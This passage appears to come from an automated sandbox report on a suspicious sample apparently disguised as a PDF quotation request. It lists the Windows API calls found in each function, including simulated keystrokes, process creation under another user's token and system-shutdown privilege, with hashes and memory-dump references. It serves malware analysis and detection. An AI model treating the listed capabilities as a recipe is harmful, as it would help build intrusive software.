                                                                    • SendMessageW.USER32 ref: 0047CE93
                                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,03391B88,00000000,?,?,?,?), ref: 0047CF1C
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,03391B88,00000000,?,?,?,?), ref: 0047CFE6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3100379633-4164748364
                                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                    Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                    • IsIconic.USER32(?), ref: 0043444F
                                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 2889586943-2988720461
                                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                    Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                    • _wcslen.LIBCMT ref: 00446498
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                    • String ID: $@OH$default$winsta0
                                                                    • API String ID: 3324942560-3791954436
                                                                    • Opcode ID: 10c3fb1b2ee01ec7db114f89b9bb3e6e5321ff8b0674ed723ea1126b2adc0b8e
                                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                    • Opcode Fuzzy Hash: 10c3fb1b2ee01ec7db114f89b9bb3e6e5321ff8b0674ed723ea1126b2adc0b8e
                                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                    Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                    • __swprintf.LIBCMT ref: 004789D3
                                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                                    • __swprintf.LIBCMT ref: 00478A79
                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                                    • __swprintf.LIBCMT ref: 00478B03
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 999945258-2428617273
                                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                    Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                                    • _wcscat.LIBCMT ref: 004034BC
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                                    • _wcslen.LIBCMT ref: 00403623
                                                                    • _wcslen.LIBCMT ref: 0040367D
                                                                    Strings
                                                                    • Error opening the file, xrefs: 00428231
                                                                    • _, xrefs: 0040371C
                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                    • Unterminated string, xrefs: 00428348
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                    • API String ID: 3393021363-188983378
                                                                    • Opcode ID: a50e8edb89c9c00785e667ee16a164b4e0d2503652e3acd12a07c488f9d64942
                                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                    • Opcode Fuzzy Hash: a50e8edb89c9c00785e667ee16a164b4e0d2503652e3acd12a07c488f9d64942
                                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                    Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                    Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2192556992-3457252023
                                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                    Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                    • __swprintf.LIBCMT ref: 004722B9
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FolderPath$LocalTime__swprintf
                                                                    • String ID: %.3d
                                                                    • API String ID: 3337348382-986655627
                                                                    • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                    • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                    Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                    Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                    • GetLastError.KERNEL32 ref: 00433414
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 2938487562-3733053543
                                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                    Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
